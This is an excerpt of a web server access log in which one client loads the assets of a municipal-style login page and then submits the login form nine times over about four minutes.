181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/Resources/CormunLogin.png HTTP/1.1" 200 19132
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/messages.spa.js?85251 HTTP/1.1" 200 30736
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/hlogin.js?2022112219184458 HTTP/1.1" 200 2156
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/gxgral.js?85251 HTTP/1.1" 200 384558
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/Resources/PXToolsLoginTop.png HTTP/1.1" 200 1337
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/Resources/PXToolsLoginBackground.png HTTP/1.1" 200 1164
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/Resources/PXToolsButtonBackground.png HTTP/1.1" 200 1176
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/Resources/PXToolsButtonLeft.png HTTP/1.1" 200 1310
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/Resources/PXToolsButtonRight.png HTTP/1.1" 200 1294
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/Resources/PXToolsLoginBottom.png HTTP/1.1" 200 1389
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/servlet/hlogin HTTP/1.1" 200 1731
181.73.125.243 - - [19/Jun/2024:17:24:25 -0300] "GET /cormun/static/Resources/indicator.gif HTTP/1.1" 200 1553
181.73.125.243 - - [19/Jun/2024:17:24:26 -0300] "GET /favicon.ico HTTP/1.1" 200 21630
181.73.125.243 - - [19/Jun/2024:17:24:49 -0300] "POST /cormun/servlet/hlogin?7505b1ab3661ecf82276035c41adb59c,gx-no-cache=1718828549448 HTTP/1.1" 200 449
181.73.125.243 - - [19/Jun/2024:17:25:16 -0300] "POST /cormun/servlet/hlogin?7505b1ab3661ecf82276035c41adb59c,gx-no-cache=1718828575510 HTTP/1.1" 200 450
181.73.125.243 - - [19/Jun/2024:17:25:36 -0300] "POST /cormun/servlet/hlogin?7505b1ab3661ecf82276035c41adb59c,gx-no-cache=1718828596357 HTTP/1.1" 200 450
181.73.125.243 - - [19/Jun/2024:17:25:59 -0300] "POST /cormun/servlet/hlogin?7505b1ab3661ecf82276035c41adb59c,gx-no-cache=1718828619529 HTTP/1.1" 200 449
181.73.125.243 - - [19/Jun/2024:17:26:33 -0300] "POST /cormun/servlet/hlogin?7505b1ab3661ecf82276035c41adb59c,gx-no-cache=1718828652901 HTTP/1.1" 200 451
181.73.125.243 - - [19/Jun/2024:17:27:08 -0300] "POST /cormun/servlet/hlogin?7505b1ab3661ecf82276035c41adb59c,gx-no-cache=1718828688508 HTTP/1.1" 200 450
181.73.125.243 - - [19/Jun/2024:17:27:40 -0300] "POST /cormun/servlet/hlogin?7505b1ab3661ecf82276035c41adb59c,gx-no-cache=1718828720224 HTTP/1.1" 200 452
181.73.125.243 - - [19/Jun/2024:17:28:27 -0300] "POST /cormun/servlet/hlogin?7505b1ab3661ecf82276035c41adb59c,gx-no-cache=1718828766777 HTTP/1.1" 200 449
181.73.125.243 - - [19/Jun/2024:17:28:50 -0300] "POST /cormun/servlet/hlogin?7505b1ab3661ecf82276035c41adb59c,gx-no-cache=1718828789785 HTTP/1.1" 200 451
